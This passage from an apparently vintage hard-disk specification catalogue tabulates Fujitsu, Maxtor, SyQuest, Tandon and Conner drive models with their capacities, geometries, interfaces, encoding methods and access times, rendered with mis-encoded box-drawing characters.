ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 52.0MB 3.50 615 4 17 ST412 5.0Mb + FK303-52 40.0MB HALF 8 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 26.0MB 3.50 615 2 17 ST412 5.0Mb + FK305-26 21.0MB HALF 4 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 3.50 615 26 ST412 7.5Mb + FK305-26R HALF RLL(2,7) + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 39.0MB 3.50 615 3 17 ST412 5.0Mb + FK305-39 32.0MB HALF 6 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 39.0MB 3.50 615 2 26 ST412 7.5Mb + FK305-39R 32.0MB HALF 4 RLL(2,7) 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 58.0MB 3.50 615 3 26 ST412 7.5Mb + FK305-58R 49.0MB HALF 6 RLL(2,7) 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 39.0MB 3.50 615 2 26 SCSI 7.5Mb + FK308S-39R 32.0MB HALF 4 RLL(2,7) 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 58.0MB 3.50 615 3 26 SCSI 7.5Mb + FK308S-58R 45.0MB HALF 6 RLL(2,7) 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 26.0MB 3.50 615 2 17 ST412 5.0Mb + FK309-26 21.0MB HALF 4 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 39.0MB 3.50 615 3 17 ST412 5.0Mb + FK309-39 32.0MB HALF 6 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJI 50.0MB 3.50 615 2 26 SCSI 7.5Mb + FK309S-50R 41.0MB HALF 4 RLL(2,7) 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + FUJITSU 320 1 17 ST412 5.0Mb + M2230AS 5.0MB 2 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + þ + + + PAGE 18 + MANUFACTURER UNFORMAT WTH. CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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DIMEN. 384.0MB 5.25 1224 8 36 SCSI 10.0Mb Y 100K + AT320S 320.0MB FULL 15 VC RLL(2,7) 16mS MAXTOR XT-4380S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 384.0MB 5.25 1224 8 36 ESDI 10.0Mb Y + AT335E 338.0MB FULL 15 VC RLL(2,7) 16mS MAXTOR XT-4380E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 768.0MB 5.25 1632 8 54 ESDI 15.0Mb Y 70K 27.0W + AT650E 651.0MB FULL 15 VC RLL(2,7) 16mS MAXTOR XT-8760E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 768.0MB 5.25 1632 8 54 SCSI 15.0Mb Y 100K + AT650S 651.0MB FULL 15 VC RLL(2,7) 16mS MAXTOR XT-8760S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 180.0MB 5.25 1224 5 36 ESDI 10.0Mb Y + PS155E 156.0MB FULL 9 VC RLL(2,7) 14mS MAXTOR XT-4170E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 180.0MB 5.25 1224 5 36 SCSI 10.0Mb Y + PS155S 156.0MB FULL 9 VC RLL(2,7) 14mS MAXTOR XT-4170S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STOR. DIMEN. 384.0MB 5.25 1224 8 36 ESDI 10.0Mb Y + PS335E 338.0MB FULL 15 VC RLL(2,7) 16mS MAXTOR XT-4380E + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + þ + + + PAGE 69 + MANUFACTURER UNFORMAT WTH. CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. PREC HD AC REC.METH ACC COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + STOR. DIMEN. 768.0MB 5.25 1632 8 54 SCSI 15.0Mb Y + PS650S 651.0MB FULL 15 VC RLL(2,7) 16mS MAXTOR XT-8760S + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST 6.0MB 5.25 306 1 17 ST412 5.0Mb + SQ-306RD 5.0MB 2 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST 12.0MB 5.25 615 1 17 ST412 5.0Mb + SQ-312RD 10.0MB 2 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST 25.0MB 5.25 615 2 17 ST412 5.0Mb + SQ-325F 20.0MB 4 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST 38.0MB 5.25 615 3 17 ST412 5.0Mb + SQ-338F 30.0MB 6 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST 5.25 640 3 17 ST412 5.0Mb + SQ-340AF 38.0MB 6 MFM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST 5.25 + SQ-555 44.0MB HALF 25mS REMOVABLE CARTR + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYSGEN 45.0MB 5.25 1 SCSI + MAXI RD45 HALF 2 RLL(2,7) 25mS REMOVABLE CARTR + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 782 3 26 ST412 7.5Mb + TM-246 62.0MB 6 RLL(2,7) 37mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 85.0MB 1004 5 17 SCSI 5.0Mb + TM2085 74.0MB 9 MFM 25mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 782 2 26 ST412 7.5Mb + TM244 41.0MB 4 RLL(2,7) 37mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 3.50 615 2 17 ST412 5.0Mb + TM262 21.4MB HALF 4 MFM 65mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 3.50 782 1 26 ST412 7.5Mb + TM262R 20.0MB HALF 2 RLL(2,7) 85mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 3.50 782 2 26 ST412 7.5Mb + TM264 41.0MB HALF 4 RLL(2,7) 85mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 3.50 782 2 26 ST412 7.5Mb + TM344 41.0MB HALF 4 RLL(2,7) 37mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 3.50 782 3 26 ST412 7.5Mb + TM346 62.0MB HALF 6 RLL(2,7) 37mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON 3.50 782 1 26 ST412 7.5Mb + TM362R 20.0MB HALF 2 RLL(2,7) 85mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + þ + + + PAGE 70 + MANUFACTURER UNFORMAT WTH. CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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CYLS PL ST INTERFACE XFER P? MTBF POWER + MODEL NUMBER FORMATED HGT. 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ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-2254 TRIGGER 2.50 19.0 253.4MB NONE AUTO 3 6 VC IDE(AT) 12ms 23.0Mb 32KB 1.2W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-XXXX SAHARA 2.50 0.5" 64.0MB NONE AUTO VC 15ms + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3000 3.50 1.0" 42.8MB 1045 NONE AUTO 40 1 2 VC IDE(AT) 980 17 5 (2,7)RLL 1400 28ms 11.0m 12.0Mb 8KB 100K 3.1W 3,557 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30060 HOPI 3.50 1.0" 60.0MB 1524 NONE AUTO 39 1 2 VC SCSI (1,7)RLL 1850 19ms 8.0ms 12.0Mb 64KB 150K 2.8W 3,399 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30061 HOPI 3.50 1.0" 60.0MB AUTO VC (2,7)RLL COMPAQ OEM, TYPE 55 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30064[H] HOP 3.50 1.0" 60.8MB 1524 NONE AUTO 39 1 2 VC IDE(AT) 762 39 4 (1,7)RLL 1850 19ms 8.0ms 12.0Mb 64KB 100K 3.3W MiG HEADS, 3,399 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30069 HOPI 3.50 1.0" 60.0MB 1524 NONE AUTO 39 1 2 VC MCA (1,7)RLL 1850 19ms 8.0ms 12.0Mb 64KB 150K 2.8W 3,399 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30080 HOPI 3.50 1.0" 84.0MB 1053 NONE AUTO 39 2 4 VC SCSI (2,7)RLL 19ms 12.0Mb 8KB 2.8W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30080E JAGUA 3.50 25.4 85.0MB 1806 NONE AUTO 46 1 2 VC SCSI (1,7)RLL 2150 17ms 8.0ms 16.0Mb 32KB 150K 2.5W 3,833 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30084 HOPI 3.50 1.0" 84.1MB 1053 NONE AUTO 39 4 8 VC IDE(AT) 526 39 8 (1,7)RLL 1400 19ms 8.0ms 12.0Mb 64KB 100K 3.3W MiG HEADS, 3,399 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30084E JAGUA 3.50 25.4 85.0MB 1806 NONE AUTO 46 1 2 VC IDE(AT) 903 46 4 (1,7)RLL 2150 17ms 3.0ms 16.0Mb 32KB 150K 2.5W 3,833 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30100[H] HOP 3.50 1.0" 121.7MB 1524 NONE AUTO 39 2 4 VC SCSI (2,7)RLL 1850 19ms 8.0ms 12.0Mb 64KB 50K 3.3W 48-BIT ECC, 3,399 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30101 HOPI 3.50 1.0" 121.0MB AUTO VC (2,7)RLL COMPAQ OEM, TYPE 50 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30104 HOPI 3.50 1.0" 121.7MB 1524 NONE AUTO 39 2 4 VC IDE(AT) 762 39 8 (1,7)RLL 1850 19ms 8.0ms 12.0Mb 64KB 100K 3.3W MiG HEADS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30104H ALLEG 3.50 25.4 120.0MB 1522 NONE AUTO 39 2 4 VC IDE(AT) 762 39 8 (1,7)RLL 1850 19ms 8.0ms 12.0Mb 32KB 150K 2.8W MiG HEADS, 3,399 RPM + 